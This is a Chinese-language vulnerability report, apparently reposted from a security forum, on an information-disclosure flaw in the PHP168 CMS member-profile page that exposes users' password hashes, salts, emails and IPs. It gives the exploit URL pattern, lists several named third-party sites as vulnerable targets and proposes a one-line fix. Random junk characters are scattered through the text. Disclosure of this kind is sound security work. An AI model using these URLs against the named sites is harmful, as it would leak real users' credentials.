|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
* G, ?) v! _1 @1 t; A9 Q
B- X8 |. x& n; ] Q/ Y2 g' l; ^以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
- x; g* p3 U# ^. |5 @% M- p& h5 s5 ]7 M" L( W& E
http://php168.cn/com/homepage.php/admin/member-profile
) C% N+ ^+ @0 Y# t4 I! i# r. O" r- m- { u2 }3 d" u/ K
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。1 ^0 A4 k7 i/ A( ^& f& H- L
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg8 C F+ [" l8 P6 b1 b6 M! \
5 ?# m' L' W8 k) J" |3 c: `/ V 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
6 [; l9 |3 u7 H% K
0 b% [+ R3 R4 y c9 ]http://www.zjfzol.com.cn/homepage.php/admin/member-profile5 m" r6 |, Y8 \4 e+ w, N! T
; z ]* E; h' K: O% B( d% q
http://www.scswl.cn/homepage.php/admin/member-profile
6 R: d: t: S4 {( L+ f3 @+ Q( [8 R& \
# t2 n, e% @$ {. j1 y/ \http://www.tunet.edu.cn/homepage.php/admin/member-profile' ]; `! p! t/ K' z! {& c1 r
& t- e. i2 N# q( I! O. Qhttp://www.itlead.com.cn/homepage.php/admin/member-profile3 ]0 \/ S4 s! J1 u2 a( U$ ]
+ |; ?; O6 P2 Ohttp://www.aedp.cn/homepage.php/admin/member-profile) H9 d3 J% Q, m
! f Q0 n' y% R. T' C+ ^http://www.qianlongnews.com/homepage.php/test/member-profile
q+ E9 X( ^ U, `7 ]. H8 N% b1 i8 c! h2 W0 m- b
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]5 ?6 h9 b/ o W7 N/ u: A( h6 q" t
[/table] |